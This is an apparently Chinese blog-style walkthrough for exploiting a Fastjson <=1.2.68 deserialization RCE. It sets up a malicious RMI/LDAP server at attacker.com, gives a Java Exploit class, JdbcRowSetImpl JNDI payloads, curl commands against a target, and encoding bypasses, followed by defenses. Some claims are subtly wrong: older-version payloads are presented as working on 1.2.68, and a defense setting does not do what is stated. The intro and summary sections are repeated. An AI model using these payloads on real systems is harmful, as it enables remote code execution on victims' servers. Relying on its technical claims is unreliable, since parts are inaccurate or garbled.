Fastjson<=1.2.68反序列化RCE漏洞分析与利用<\/h1>

前言<\/h2>
Fastjson是阿里巴巴开源的一个高性能JSON处理库，广泛用于Java应用程序中。在版本<=1.2.68中存在反序列化远程代码执行(RCE)漏洞，攻击者可以通过精心构造的JSON数据在目标系统上执行任意代码。<\/p>

漏洞背景<\/h2>
Fastjson的反序列化漏洞历史由来已久，从1.2.24版本开始就不断有相关漏洞被披露。1.2.68版本虽然修复了之前的一些问题，但仍然存在可利用的反序列化点。<\/p>

漏洞利用前提条件<\/h2>

目标系统使用Fastjson<=1.2.68版本<\/li>
目标系统存在JSON数据反序列化操作<\/li>

目标系统网络可出站（或存在可利用的内网服务）<\/li> <\/ol>

漏洞检测<\/h2>

Fastjson依赖库判断<\/h3>

通过报错信息识别：<\/p>

发送非法JSON数据，观察返回错误是否包含"fastjson"字样<\/li>
示例：{"@type":"java.lang.Class"}<\/code><\/li> <\/ul> <\/li>


通过DNS查询识别：<\/p>

构造包含DNS查询的payload，观察是否有DNS解析请求<\/li>
示例：{"@type":"java.net.Inet4Address","val":"dnslog.cn"}<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用步骤<\/h2>
1. 搭建恶意RMI\/LDAP服务<\/h3>
攻击者需要搭建一个恶意的RMI或LDAP服务来提供恶意类加载：<\/p>
# 使用marshalsec工具搭建RMI服务<\/span>
<\/span><\/span>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http:\/\/attacker.com\/#Exploit"<\/span> 1099<\/span>
<\/span><\/span><\/code><\/pre>2. 构造恶意Exploit类<\/h3>
创建包含恶意代码的Java类文件：<\/p>
public<\/span> class<\/span> Exploit<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"calc.exe"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>编译后放置在攻击者控制的Web服务器上。<\/p>
3. 构造恶意JSON Payload<\/h3>
针对Fastjson<=1.2.68的payload示例：<\/p>
{
<\/span><\/span>    "@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,
<\/span><\/span>    "dataSourceName"<\/span>:"rmi:\/\/attacker.com:1099\/Exploit"<\/span>,
<\/span><\/span>    "autoCommit"<\/span>:true<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 发送Payload触发漏洞<\/h3>
将构造好的JSON数据发送到目标系统的Fastjson反序列化接口：<\/p>
curl -X POST --data '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi:\/\/attacker.com:1099\/Exploit","autoCommit":true}'<\/span> http:\/\/target.com\/api\/json
<\/span><\/span><\/code><\/pre>绕过技巧<\/h2>
对于某些环境限制，可以采用以下绕过方式：<\/p>


使用特殊字符绕过<\/strong>：<\/p>
{"@type"<\/span>:"Lcom.sun.rowset.JdbcRowSetImpl;"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/attacker.com\/Exploit"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用十六进制编码<\/strong>：<\/p>
{"@type"<\/span>:"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c"<\/span>,"dataSourceName"<\/span>:"rmi:\/\/attacker.com\/Exploit"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用LDAP替代RMI<\/strong>：<\/p>
{"@type"<\/span>:"com.sun.rowset.JdbcRowSetImpl"<\/span>,"dataSourceName"<\/span>:"ldap:\/\/attacker.com:1389\/Exploit"<\/span>,"autoCommit"<\/span>:true<\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
防御措施<\/h2>


升级Fastjson<\/strong>：<\/p>

升级到最新版本(1.2.83或更高)<\/li>
使用安全模式：ParserConfig.getGlobalInstance().setSafeMode(true);<\/code><\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

对输入的JSON数据进行严格验证<\/li>
禁用@type<\/code>特性：JSON.parseObject(jsonStr, Object.class, Feature.SupportNonPublicField)<\/code><\/li>
<\/ul>
<\/li>

JVM防护<\/strong>：<\/p>

设置com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>
设置com.sun.jndi.ldap.object.trustURLCodebase=false<\/code><\/li>
<\/ul>
<\/li>

网络限制<\/strong>：<\/p>

限制应用程序的出站连接<\/li>
使用网络防火墙规则限制不必要的协议<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞验证工具<\/h2>


手动验证<\/strong>：<\/p>
curl -X POST --data '{"@type":"java.net.Inet4Address","val":"dnslog.xxx"}'<\/span> http:\/\/target.com\/api\/json
<\/span><\/span><\/code><\/pre><\/li>

自动化工具<\/strong>：<\/p>

fastjson_tool：https:\/\/github.com\/wyzxxz\/fastjson_rce_tool<\/li>
FastjsonScan：https:\/\/github.com\/earayu\/fastjson_scanner<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
Fastjson<=1.2.68的反序列化漏洞是一个严重的安全问题，攻击者可以通过精心构造的JSON数据在目标系统上执行任意代码。及时升级到安全版本并实施适当的防御措施是保护系统的关键。<\/p>

Fastjson<=1.2.68反序列化RCE漏洞分析与利用<\/h1>

前言<\/h2> Fastjson是阿里巴巴开源的一个高性能JSON处理库，广泛用于Java应用程序中。在版本<=1.2.68中存在反序列化远程代码执行(RCE)漏洞，攻击者可以通过精心构造的JSON数据在目标系统上执行任意代码。<\/p>

漏洞背景<\/h2> Fastjson的反序列化漏洞历史由来已久，从1.2.24版本开始就不断有相关漏洞被披露。1.2.68版本虽然修复了之前的一些问题，但仍然存在可利用的反序列化点。<\/p>

漏洞检测<\/h2>

漏洞利用步骤<\/h2>

总结<\/h2> Fastjson<=1.2.68的反序列化漏洞是一个严重的安全问题，攻击者可以通过精心构造的JSON数据在目标系统上执行任意代码。及时升级到安全版本并实施适当的防御措施是保护系统的关键。<\/p>

前言<\/h2>
Fastjson是阿里巴巴开源的一个高性能JSON处理库，广泛用于Java应用程序中。在版本<=1.2.68中存在反序列化远程代码执行(RCE)漏洞，攻击者可以通过精心构造的JSON数据在目标系统上执行任意代码。<\/p>

漏洞背景<\/h2>
Fastjson的反序列化漏洞历史由来已久，从1.2.24版本开始就不断有相关漏洞被披露。1.2.68版本虽然修复了之前的一些问题，但仍然存在可利用的反序列化点。<\/p>

总结<\/h2>
Fastjson<=1.2.68的反序列化漏洞是一个严重的安全问题，攻击者可以通过精心构造的JSON数据在目标系统上执行任意代码。及时升级到安全版本并实施适当的防御措施是保护系统的关键。<\/p>